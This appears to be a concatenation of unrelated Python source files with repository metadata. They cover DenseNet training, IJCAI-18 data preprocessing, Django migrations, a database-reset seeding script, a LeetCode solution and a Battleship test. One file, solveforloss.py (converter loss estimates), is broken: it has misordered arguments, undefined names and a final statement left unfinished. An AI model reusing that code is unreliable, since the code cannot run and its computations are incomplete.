self.net.add(conv_block(growth_rate))
def forward(self, x):
for layers in self.net:
out = layers(x)
x = nd.concat(x, out, dim = 1)
return x
dblk = DenseBlock(2, 10)
dblk.initialize()
x = nd.random_uniform(shape=(4, 3, 8, 8))
print(dblk(x).shape)
# Transition Block
def transition_block(channels):
out = nn.Sequential()
out.add(
nn.BatchNorm(),
nn.Activation('relu'),
nn.Conv2D(channels, kernel_size=1),
nn.AvgPool2D(pool_size=2, strides=2)
)
return out
tblk = transition_block(10)
tblk.initialize()
print(tblk(x).shape)
# define DenseNet
init_channels = 64
growth_rate = 32
block_layers = [6, 12, 24, 16]
num_classes = 10
def dense_net():
net = nn.Sequential()
with net.name_scope():
net.add(
nn.Conv2D(init_channels, kernel_size=7, strides=2, padding=3),
nn.BatchNorm(),
nn.Activation('relu'),
nn.MaxPool2D(pool_size=3, strides=2, padding=1)
)
# dense block
channels = init_channels
for i, layer in enumerate(block_layers):
net.add(DenseBlock(layer, growth_rate))
channels += layer * growth_rate
if i != len(block_layers) - 1:
net.add(transition_block(channels // 2))
# last block
net.add(
nn.BatchNorm(),
nn.Activation('relu'),
nn.AvgPool2D(pool_size=1),
nn.Flatten(),
nn.Dense(num_classes)
)
return net
train_data, test_data = utils.load_data_fashion_mnist(batch_size=64, resize=32)
net = dense_net()
net.initialize(init=init.Xavier())
loss = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate':0.1})
print("start training...")
utils.train(train_data, test_data, net, loss, trainer, ctx=mx.cpu(), num_epochs = 1)
|
[
"song_mh@yeah.net"
] |
song_mh@yeah.net
|
5d2aee020a2f30f6bfef89bf80f619282966bf4a
|
8fdf8b3a99b80429c74c977a63595b156c849471
|
/pre_proc/trans_csv.py
|
f54e46cbc2c2519a79c1c3fa326708dc3a487b05
|
[] |
no_license
|
swfxliyiyu/pre_cvr
|
0c48beae6eb2b14f73cd50cf7e0568c1985e57cc
|
3775d157e8052cd552cce10ae241b6006b54d86a
|
refs/heads/master
| 2020-03-09T00:55:51.135784
| 2018-04-02T09:23:46
| 2018-04-02T09:23:46
| 128,500,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,204
|
py
|
import pandas as pd
from pandas.core.groupby import SeriesGroupBy
from sklearn.preprocessing import StandardScaler, MultiLabelBinarizer
import numpy as np
from collections import defaultdict
com = ['instance_id', 'is_trade']
TR_PATH = '../data/train_tc.csv'
TE_PATH = '../data/test_tc.csv'
cate_feats = {1: 'hour', 2: 'item_city_id', 3: 'item_price_level', 4: 'item_sales_level',
5: 'item_collected_level', 6: 'item_pv_level', 7: 'item_category_list', 8: 'user_gender_id',
9: 'user_age_level', 10: 'user_occupation_id', 11: 'user_star_level', 12: 'shop_review_num_level',
13: 'shop_star_level', 14: 'day', 15: 'item_brand_id', 16: 'shop_id', 17: 'item_id'}
num_feats = {1: 'shop_review_positive_rate', 2: 'shop_score_service', 3: 'shop_score_delivery',
4: 'shop_score_description'}
tr_data = pd.read_csv("../data/round1_ijcai_18_train_20180301.txt", sep=' ').sort_values(['context_timestamp'],
kind='heapsort')
te_data = pd.read_csv("../data/round1_ijcai_18_test_a_20180301.txt", sep=' ')
te_data['is_trade'] = 0
# 处理需要输出的结果
tr_out = pd.DataFrame()
te_out = pd.DataFrame()
# 标签和Id属性
tr_out[['Id', 'Label']] = tr_data[com]
te_out[['Id', 'Label']] = te_data[com]
# 时间属性
tr_data['date'] = tr_data['context_timestamp'].apply(lambda stamp: pd.datetime.utcfromtimestamp(stamp))
te_data['date'] = te_data['context_timestamp'].apply(lambda stamp: pd.datetime.utcfromtimestamp(stamp))
tr_data['day_hour'] = tr_data['date'].apply(lambda date: date.strftime('%d-%H'))
te_data['day_hour'] = te_data['date'].apply(lambda date: date.strftime('%d-%H'))
tr_data['day'] = tr_data['day_hour'].apply(lambda day_hour: day_hour.split('-')[0])
te_data['day'] = '24' # 当成最后一天看
tr_data['hour'] = tr_data['day_hour'].apply(lambda day_hour: day_hour.split('-')[1])
te_data['hour'] = te_data['day_hour'].apply(lambda day_hour: day_hour.split('-')[1])
# 该小时的点击量
# tr_data['click_hour'] = tr_data['day_hour'].replace(tr_data.groupby(['day_hour'])['is_trade'].count())
# te_data['click_hour'] = te_data['day_hour'].replace(te_data.groupby(['day_hour'])['is_trade'].count()) / 0.3
mlb = MultiLabelBinarizer()
def fuc(ele):
res = []
lst = ele.split(';')
for i in lst:
if i in dic:
res.append(i)
return res
# 类别信息
dic = defaultdict(lambda: 0)
tr_cates = map(lambda ele: ele.split(';'), tr_data['item_category_list'])
for props in tr_cates:
for prop in props:
dic[prop] += 1
for k in list(dic.keys()):
if dic[k] < 1000:
dic.pop(k)
print(len(dic))
tr_cates = map(fuc, tr_data['item_category_list'])
tr_cates = mlb.fit_transform(tr_cates)
te_cates = map(fuc, te_data['item_category_list'])
te_cates = mlb.transform(te_cates)
# 属性信息
dic = defaultdict(lambda: 0)
tr_props = map(lambda ele: ele.split(';'), tr_data['item_property_list'])
for props in tr_props:
for prop in props:
dic[prop] += 1
for k in list(dic.keys()):
if dic[k] < 12000:
dic.pop(k)
print(len(dic))
tr_props = map(fuc, tr_data['item_property_list'])
tr_props = mlb.fit_transform(tr_props)
te_props = map(fuc, te_data['item_property_list'])
te_props = mlb.transform(te_props)
# 预测信息
dic = defaultdict(lambda: 0)
tr_pred = map(lambda ele: ele.split(';'), tr_data['predict_category_property'])
for props in tr_pred:
for prop in props:
dic[prop] += 1
for k in list(dic.keys()):
if dic[k] < 12000:
dic.pop(k)
print(len(dic))
tr_pred = map(fuc, tr_data['predict_category_property'])
tr_pred = mlb.fit_transform(tr_pred)
te_pred = map(fuc, te_data['predict_category_property'])
te_pred = mlb.transform(te_pred)
# 合并以上信息
tr_info = np.concatenate((tr_cates, tr_props, tr_pred), axis=1)
te_info = np.concatenate((te_cates, te_props, te_pred), axis=1)
c_names = list(map(lambda i: 'I'+str(i), range(len(num_feats) + 1, len(num_feats) + 1 + tr_info.shape[1])))
print('开始转换类别特征...')
for i, feat in cate_feats.items():
print('正在转换特征:{}'.format(feat))
val_count = tr_data[feat].value_counts()
val_count[val_count < 1000] = '-9999'
if val_count.dtype != 'object':
print('该特征将从int转换为object类型...')
val_count = val_count.astype('object')
val_count[val_count != '-9999'] = val_count[val_count != '-9999'].index
tr_out['C{}'.format(i)] = tr_data[feat].replace(val_count)
te_out['C{}'.format(i)] = te_data[feat].replace(val_count)
print('开始转换数值特征...')
c_size = len(cate_feats)
for i, feat in num_feats.items():
print('正在转换特征:{}'.format(feat))
tr_data[feat] = tr_data[feat].astype('float')
te_data[feat] = te_data[feat].astype('float')
std = np.std(tr_data[feat])
tr_out['C{}'.format(i + c_size)] = 10 * (tr_data[feat] - tr_data[feat].mean()) / std
te_out['C{}'.format(i + c_size)] = 10 * (te_data[feat] - tr_data[feat].mean()) / std # 使用训练数据的均值方差
tr_out['C{}'.format(i + c_size)] = tr_out['C{}'.format(i + c_size)].astype('int')
te_out['C{}'.format(i + c_size)] = te_out['C{}'.format(i + c_size)].astype('int')
tr_out['I{}'.format(i)] = tr_data[feat]
te_out['I{}'.format(i)] = te_data[feat]
# tr_out['C{}'.format(i+c_size)] = tr_out['I{}'.format(i)].apply(lambda s: str(s)[:min(len(str(s)), 4)])
# te_out['C{}'.format(i+c_size)] = te_out['I{}'.format(i)].apply(lambda s: str(s)[:min(len(str(s)), 4)])
val_count = tr_out['C{}'.format(i + c_size)].value_counts()
val_count[val_count < 1000] = '-9999'
if val_count.dtype != 'object':
print('该特征将从int转换为object类型...')
val_count = val_count.astype('object')
val_count[val_count != '-9999'] = val_count[val_count != '-9999'].index
tr_out['C{}'.format(i + c_size)] = tr_out['C{}'.format(i + c_size)].replace(val_count)
te_out['C{}'.format(i + c_size)] = te_out['C{}'.format(i + c_size)].replace(val_count)
# 额外处理
n_size = len(num_feats)
tr_out['I{}'.format(1 + n_size)] = tr_data['day']
te_out['I{}'.format(1 + n_size)] = te_data['day']
for feat in tr_out:
if feat in ['C15', 'C16', 'C17']: # ID特征
val_count = tr_out[feat].value_counts()
val_count[val_count < 3000] = '-9999'
if val_count.dtype != 'object':
print('该特征将从int转换为object类型...')
val_count = val_count.astype('object')
val_count[val_count != '-9999'] = val_count[val_count != '-9999'].index
tr_out[feat] = tr_out[feat].replace(val_count)
te_out[feat] = te_out[feat].replace(val_count)
# 链接类别属性特征
print(te_out.shape)
print(te_info.shape)
print(tr_info.shape)
print(te_info.shape)
print(len(c_names))
tr_info = pd.DataFrame(tr_info, index=tr_out.index, columns=c_names)
te_info = pd.DataFrame(te_info, index=te_out.index, columns=c_names)
tr_out = pd.concat((tr_out, tr_info), axis=1)
te_out = pd.concat((te_out, te_info), axis=1)
tr_out.astype('object').to_csv(TR_PATH, index=False)
te_out.astype('object').to_csv(TE_PATH, index=False)
|
[
"yiyuli233@gmail.com"
] |
yiyuli233@gmail.com
|
08a4e3fb57ed130981c8e79f2b1cad54958f305a
|
cb2aef5f7575a3d3c4bb8187e79b3905494e36c5
|
/project1/WhatDidYouEat/migrations/0003_content_image.py
|
2d10adbd8628abff6cb52e31bbb0a6088908593c
|
[] |
no_license
|
jisun-16/mysite_jisun
|
ec585c650e20f408ee6750965b48d99de8ca90a2
|
d5a4392bab1e8fb599e828fe60b118046fa152f6
|
refs/heads/master
| 2022-08-16T21:23:28.271592
| 2020-05-25T12:55:24
| 2020-05-25T12:55:24
| 254,623,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Generated by Django 3.0.5 on 2020-05-25 12:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('WhatDidYouEat', '0002_comment'),
]
operations = [
migrations.AddField(
model_name='content',
name='image',
field=models.ImageField(blank=True, upload_to='images/'),
),
]
|
[
"limjisun97@naver.com"
] |
limjisun97@naver.com
|
c2c8ecf7b47f6b2ed06b6019cf762f5c42bb12f3
|
7cbf72100d8d4c7e6bd9a04996f7703e77653f57
|
/src/quicksetup.py
|
9d93d4b024783a54bf75ef3440f74149d755492e
|
[] |
no_license
|
BKitor/HangoverGame
|
ea772b4812fc39fb5986f74510a99be5219f3c99
|
ce00ab61bc133f6baab1f094d7f72786ed73ce4b
|
refs/heads/master
| 2021-06-19T21:30:40.490455
| 2020-06-17T17:30:22
| 2020-06-17T17:30:22
| 209,633,155
| 1
| 0
| null | 2021-06-10T19:39:15
| 2019-09-19T19:28:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
import os
import sys
import requests
print(sys.argv)
host_url = "192.168.1.30"
if len(sys.argv) > 1:
host_url = sys.argv[1]
os.system("python manage.py flush --noinput")
user = requests.post(f"http://{host_url}:8000/users/create/", json={
"email": "test@test.test",
"username": "test",
"first_name": "test",
"last_name": "test",
"password": "test",
"date_joined": "2019-10-20T00:00",
"last_joined": "2019-10-20T00:00",
}).json()
questions = []
for i in range(0, 3):
res = requests.post(f"http://{host_url}:8000/api/questions", json={"prompt": f"test_question{i}"}, )
questions.append(res.json()['uuid'])
quiz = requests.post(f"http://{host_url}:8000/api/quizzes", json={
"name": "test_quiz",
"author": user["id"],
"questions": []
}).json()
quiz = requests.put(f"http://{host_url}:8000/api/quizzes", json={
"uuid": quiz['uuid'],
'questions': questions
}).json()
game = requests.post(f"http://{host_url}:8000/api/games", json={
"game_name": "g",
"quiz_uuid": quiz['uuid'],
"host_uuid": user['id'],
}).json()
|
[
"bkitor@gmail.com"
] |
bkitor@gmail.com
|
33be66bdba922fe48cca88e547513a8effdd081e
|
39c81fdff397915b8682c53475d884cae42e9303
|
/solutions/search-insert-position.py
|
a7f180731a84ecb9c2fd39af52f2a27e358641a5
|
[] |
no_license
|
kesavvvvv/leetcode-solutions
|
10c641dbf8b5032974b6f6dded5c47e7ba69581b
|
acbefc1742caa679ba5fffca5e2b28c7d42cc9a5
|
refs/heads/master
| 2022-12-05T19:26:27.852923
| 2020-08-23T15:08:56
| 2020-08-23T15:08:56
| 282,949,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
for i, num in enumerate(nums):
if num >= target:
return i
return i + 1
|
[
"noreply@github.com"
] |
kesavvvvv.noreply@github.com
|
21a30c790e4ad89321c7def95f73d0d06bf93351
|
a3ad75c4e2b0279759a47a55a3ef2450b70b9d39
|
/feedback/admin.py
|
ea8f6b8f0fcf8f5eecfc6e7fe6976055208a65ee
|
[] |
no_license
|
RihardXXX/shop
|
bc4abf34cb4a547fc8cf110ff4a7a02ec1808ffc
|
769438c28180cc6f7e016877c62869eb8d05c4d9
|
refs/heads/master
| 2020-12-09T10:31:05.400948
| 2020-02-17T22:16:22
| 2020-02-17T22:16:22
| 233,277,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 449
|
py
|
from django.contrib import admin
"""Тут прописываем, как будет работать наша админ панель нашего приложения"""
"""Импортируем Класс Категори из файла модели"""
from .models import Feedback
"""Регистрируем наш класс модель для управления в админ части сайта"""
admin.site.register(Feedback)
|
[
"yusupa.akaeva@yandex.ru"
] |
yusupa.akaeva@yandex.ru
|
e8c17eea74c5ea748252a4fd75b1032006313127
|
420631859f760328336172919a7c9228bb903252
|
/settings_model/migrations/0001_initial.py
|
a8da7c6e358438f13e03e8503b217f8de20baa88
|
[
"MIT"
] |
permissive
|
gregschmit/django-settings-model
|
6067da65bbb3f936ae6a60e492fdd7c73d75fc68
|
ba8e3302291f367247624dbf47a9d70ceaa4ef8f
|
refs/heads/master
| 2020-08-21T11:51:34.184072
| 2019-12-04T03:49:35
| 2019-12-04T03:49:35
| 216,153,680
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
# Generated by Django 2.2.4 on 2019-12-04 03:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Settings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"name",
models.CharField(default="Default", max_length=255, unique=True),
),
("is_active", models.BooleanField(default=True)),
("debug_mode", models.BooleanField(default=True)),
("secret_key", models.CharField(blank=True, max_length=255)),
("append_slash", models.BooleanField(default=False)),
(
"allowed_hosts",
models.CharField(
blank=True,
help_text="A comma-delimited list of hosts for which this application is allowed to respond to.",
max_length=255,
),
),
],
options={"verbose_name": "Settings", "verbose_name_plural": "Settings"},
),
]
|
[
"schmitgreg@gmail.com"
] |
schmitgreg@gmail.com
|
20f2fe242806d531fc658c662bc7408d9d8ea68f
|
9e06975b642fefa448b1e92a41c102f3b88a02bf
|
/acubor/core/migrations/0002_auto__add_field_companysetting_lotto_tracking__add_field_companysettin.py
|
1b918883d828b3f0f3e176643e7f577fd1dbd14c
|
[] |
no_license
|
bishnusyangja/Accment-for-Accounting
|
024135548e829fe772552ffcc42d4f292245903b
|
83128d2abd7f92eb58f73b18a9816bd1c1de3549
|
refs/heads/master
| 2021-01-23T08:11:09.935512
| 2015-02-10T03:57:43
| 2015-02-10T03:57:43
| 30,546,555
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,373
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CompanySetting.lotto_tracking'
db.add_column(u'core_companysetting', 'lotto_tracking',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Adding field 'CompanySetting.inventory_tracking'
db.add_column(u'core_companysetting', 'inventory_tracking',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CompanySetting.lotto_tracking'
db.delete_column(u'core_companysetting', 'lotto_tracking')
# Deleting field 'CompanySetting.inventory_tracking'
db.delete_column(u'core_companysetting', 'inventory_tracking')
models = {
u'core.companysetting': {
'Meta': {'object_name': 'CompanySetting'},
'account_coding': ('django.db.models.fields.CharField', [], {'default': "'Automatic'", 'max_length': '9'}),
'company': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'settings'", 'unique': 'True', 'to': u"orm['users.Company']"}),
'decimal_places': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory_tracking': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'lotto_tracking': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'number_comma_system': ('django.db.models.fields.CharField', [], {'default': "'120,000'", 'max_length': '8'}),
'region_setting': ('django.db.models.fields.CharField', [], {'default': "'North America'", 'max_length': '15'})
},
u'core.currency': {
'Meta': {'object_name': 'Currency', 'db_table': "'currency'"},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest_usd_rate': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.vouchersetting': {
'Meta': {'object_name': 'VoucherSetting'},
'bank_cash_deposit_heading': ('django.db.models.fields.CharField', [], {'default': "'Bank Cash Deposit'", 'max_length': '100'}),
'bank_cash_deposit_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'bank_cash_deposit_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_payment_heading': ('django.db.models.fields.CharField', [], {'default': "'Cash Payment'", 'max_length': '100'}),
'cash_payment_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_payment_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_receipt_heading': ('django.db.models.fields.CharField', [], {'default': "'Cash Receipt'", 'max_length': '100'}),
'cash_receipt_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cash_receipt_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cheque_deposit_heading': ('django.db.models.fields.CharField', [], {'default': "'Cheque Deposit'", 'max_length': '100'}),
'cheque_deposit_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cheque_deposit_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'cheque_payment_heading': ('django.db.models.fields.CharField', [], {'default': "'Cheque Payment'", 'max_length': '100'}),
'company': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'voucher_settings'", 'unique': 'True', 'to': u"orm['users.Company']"}),
'eft_in_heading': ('django.db.models.fields.CharField', [], {'default': "'EFT In'", 'max_length': '100'}),
'eft_in_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'eft_in_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'eft_out_heading': ('django.db.models.fields.CharField', [], {'default': "'EFT Out'", 'max_length': '100'}),
'fixed_assets_heading': ('django.db.models.fields.CharField', [], {'default': "'Fixed Assets Voucher'", 'max_length': '100'}),
'fixed_assets_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'fixed_assets_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_heading': ('django.db.models.fields.CharField', [], {'default': "'Invoice'", 'max_length': '100'}),
'invoice_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'invoice_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'journal_voucher_heading': ('django.db.models.fields.CharField', [], {'default': "'Journal Voucher'", 'max_length': '100'}),
'journal_voucher_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'journal_voucher_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'physicalstock_heading': ('django.db.models.fields.CharField', [], {'default': "'Physical Stock Voucher'", 'max_length': '100'}),
'physicalstock_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'physicalstock_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'purchase_voucher_heading': ('django.db.models.fields.CharField', [], {'default': "'Purchase Voucher'", 'max_length': '100'}),
'purchase_voucher_prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'purchase_voucher_suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'null': 'True', 'blank': 'True'}),
'voucher_number_restart_days': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'voucher_number_restart_months': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'voucher_number_restart_years': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'voucher_number_start_date': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 5, 20, 0, 0)'})
},
u'users.company': {
'Meta': {'object_name': 'Company', 'db_table': "u'company'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.TextField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'type_of_business': ('django.db.models.fields.CharField', [], {'max_length': '254'})
}
}
complete_apps = ['core']
|
[
"bishnusyangja@gmali.com"
] |
bishnusyangja@gmali.com
|
44067309cce2f49327539fe730ae79f746465a87
|
37c9ffb99e509aaa55e911ce400c6a3c9c1fb660
|
/solveforloss.py
|
b36b05c07c6f43cb671669cb0c4ae28d8a70cd9f
|
[] |
no_license
|
c6ishere/dape
|
be3cd5ff2cedcc947f391f59f9abc4aa53da3e96
|
190012b4bff384711802c0e9a7ee800711b723ce
|
refs/heads/master
| 2020-08-16T03:26:49.943357
| 2019-10-16T06:44:04
| 2019-10-16T06:44:04
| 215,448,683
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,613
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 19 21:09:54 2019
@author: c6
"""
import numpy as np
import math
def CalculateDabLoss(r_ds_on_pri = 13e-3, # r_switch i>0 CAS120M12BM2
r_ds_on_sec = 1.5/120, # r_switch i<0 CAS120M12BM2
r_trans_pri = 45e-3,
r_trans_sec = 45e-3,
r_inductor = 22.5e-3,
r_capacitor = 22.5e-3,
r_pcb_ac = 263e-6,
r_pcb_dc = 219e-6,
e_sw = 3e-3/600/120,
um_vec,
vout_vec,
il_vec,
t_vec):
il_rms = np.sqrt(np.mean(il_vec**2))
ptr_cond, p_core = CalculateTransformerLoss(il_rms,um_vec)
pl_cond = r_inductor*il_rms*il_rms
p_pcb_cond = (r_pcb_ac+r_pcb_dc)*il_rms*il_rms
pc_cond = r_capacitor*il_rms*il_rms
pswitch_cond = CalculateSwitchConductionLoss(il_vec,vout_vec,t_vec)
def CalculateTransformerLoss(il_rms):
# -----------core parameter
k = 1.409
alpha = 1.33
beta = 1.712
n1 = 8
ae = 1160e-6
ki = KiCal(k,alpha,beta,1e-3)
core_np = 5
bs = 0.4
le = 504e-3
ve = 593600e-9
w_core = 30e-3
w_hole = 70e-3
l_core = 5*47e-3-7e-3
h_hole = 126e-3
# -------------winding parameter
d0 = 0.1e-3 # Single strand diameter
dc_single_wire = 4.4e-3 # Single Litz wire diameter
n_single_wire = 1050 # Number of strands in a single wire
wire_np = 10
dc = dc_single_wire*np.sqrt(wire_np*4/math.pi)
n0 = wire_np*n_single_wire
n = n1
m_max = np.floor(w_hole/2/dc_single_wire)
m_min = np.ceil(n*dc/h_hole)
m = m_min
l = 2*w_core + 2*l_core + 8*dc*m + 4*10e-3
# -------------waveform parameters
pv = CoreLoss(um_vec, t_vec, k, alpha, beta, n1, ae*core_np, ki)
p_core = pv*ve*core_np
copper_loss1 = CopperLoss(il_rms, fs, d0, dc, n0, 2*n, 2*m, l)
rou = 1/59/6e6
mu0 = 4*math.pi*1e-7
d02 = 5e-3
dc2 = 5e-3
n02 = 1
n2 = 1
m2 = 1
l2 = 4
delta = math.sqrt(rou/math.pi/mu0/fs)
zeta = d02/delta
p = posai(zeta, 50)
kd = zeta/2/math.sqrt(2)*p
rdc = l2*4*n2*rou/n02/math.pi/d02/d02
rac = kd*rdc
copper_loss2 = il_rms*il_rms*rac
ptr_cond = copper_loss1+copper_loss2
return ptr_cond, p_core
def KiCal(k, alpha, beta, step):
x = np.linspace(0,step,2*math.pi)
y = np.abs(np.power(np.cos(x),alpha)*np.power(2,beta-alpha))
integral = np.trapz(y,x)
return k/np.power(2*math.pi,alpha-1)/integral
def CoreLoss(um, t, k, alpha, beta, n1, ae, ki):
parse_step = 10
t = t[np.linspace(0,t[-1],parse_step)]
um = um[np.linspace(0,um[-1],parse_step)]
dt = t[1]-t[0]
u_integ = np.zeros(np.shape(um))
u_integ[0] = um[0]
for i in range(1,np.shape(um)):
u_integ[i] = u_integ[i-1] + um[i]
b = dt*u_integ/n1/ae
min_b = np.min(b)
max_b = np.max(b)
b_extend1 = np.column_stack(b[-1],b[0:-2])
b_extend2 = np.column_stack(b[1:-1],b[0])
t_extend1 = np.column_stack(t[0]-dt,t[0:-1])
t_extend2 = np.column_stack(t[1:-1],t[-1]+dt)
db = (b_extend2-b_extend1)/(t_extend2-t_extend1)
integral = np.trapz(ki*np.abs(np.power(db,alpha)*np.power((max_b-min_b),(beta-alpha))),t)
return integral/(t[-1]-t[0])
def wireResis(f, d0, dc, n0, n, m, l):
rou = 1/59.6e6
mu0 = 4*math.pi*1e-7
b = np.power((d0/2),2)*n0/np.power((dc/2),2)
delta = np.sqrt(rou/math.pi/mu0/f)
def CalculateSwitchConductionLoss(il_vec,vout_vec,t_vec):
wpri_cond =
|
[
"313994566@qq.com"
] |
313994566@qq.com
|
22a21b51c6ebe82370f1f7a066d1130fa27a4d10
|
35a14aea825e40b6284388827407e17b9e4fd688
|
/test/TestGame.py
|
e3ef646cfccfbc023db3a5d2bc2a2106bb0cbc29
|
[] |
no_license
|
spatzle/Practice-Battleship
|
77411a1ea950982924cfdce193ed07300ae8dd0f
|
9b062a12b3b1e958154c6089ab847d0632d6d971
|
refs/heads/master
| 2021-01-13T02:03:22.612825
| 2011-03-23T14:35:32
| 2011-03-23T14:35:32
| 1,516,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 995
|
py
|
'''
Created on 2011-03-22
@author: joyce
'''
import unittest
from Player import Player
from Point import Point
from PlayerError import FleetNotAllOnGrid
from Game import Game
class TestGame(unittest.TestCase):
def _setupPlayer(self,p,g):
m = p.mygrid
m.placeShipOnGrid(p.fleet.destroyer, Point([1,1]), Point([2,1]))
m.placeShipOnGrid(p.fleet.submarine, Point([4,1]), Point([6,1]))
m.placeShipOnGrid(p.fleet.cruiser, Point([2,3]), Point([2,5]))
m.placeShipOnGrid(p.fleet.battleship, Point([6,5]), Point([9,5]))
m.placeShipOnGrid(p.fleet.aircraftcarrier, Point([2,9]), Point([6,9]))
print(m)
try:
p.ready()
except FleetNotAllOnGrid:
'''
will try again
'''
def testGameOk(self):
g = Game()
self._setupPlayer(g.player1,g)
self._setupPlayer(g.player2,g)
g.play()
if __name__ == '__main__':
unittest.main()
|
[
"joyce.sz.chan@gmail.com"
] |
joyce.sz.chan@gmail.com
|
80ea75adc5da4fe81b94b066b777d0f2d6067b03
|
f9a8aecd848bcc79052ca068cc73850a63e6dfcf
|
/training/in_out/storage_manager.py
|
5d34501fdf93be3a637da857c22a455e520d89a5
|
[
"MIT"
] |
permissive
|
khoehlein/fV-SRN-Ensemble-Compression
|
537981a1cd31565bb504b00ca730e8bf87e7e0ef
|
2780b83d2594c1b38b57ab58087b46bee4b61e8b
|
refs/heads/master
| 2023-04-17T09:42:48.037397
| 2022-09-07T08:55:01
| 2022-09-07T08:55:01
| 532,983,107
| 4
| 1
| null | 2022-09-06T14:39:26
| 2022-09-05T16:43:24
|
Python
|
UTF-8
|
Python
| false
| false
| 7,867
|
py
|
import argparse
import io
import json
import os
import shutil
import subprocess
import sys
import h5py
import imageio
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
class StorageManager(object):
class CheckpointKey(object):
EPOCH = 'epoch'
PARAMETERS = 'parameters'
MODEL = 'model'
@staticmethod
def init_parser(parser: argparse.ArgumentParser, base_directory):
parser_group = parser.add_argument_group("Output")
prefix = '--output:'
parser.add_argument(prefix + 'base-dir', type=str, default=base_directory)
parser_group.add_argument(prefix + 'log-dir', type=str, default='results/log',
help='directory for tensorboard logs')
parser_group.add_argument(prefix + 'checkpoint-dir', type=str, default='results/model',
help='Output directory for the checkpoints')
parser_group.add_argument(prefix + 'hdf5-dir', type=str, default='results/hdf5',
help='Output directory for the hdf5 summary files')
parser_group.add_argument(prefix + 'experiment-name', type=str, default=None,
help='Output name. If not specified, use the next available index')
parser_group.add_argument(prefix + 'save-frequency', type=int, default=10,
help='Every that many epochs, a checkpoint is saved')
parser_group.add_argument('--profile', action='store_true')
def __init__(self, opt, overwrite_output=False):
self.opt = opt
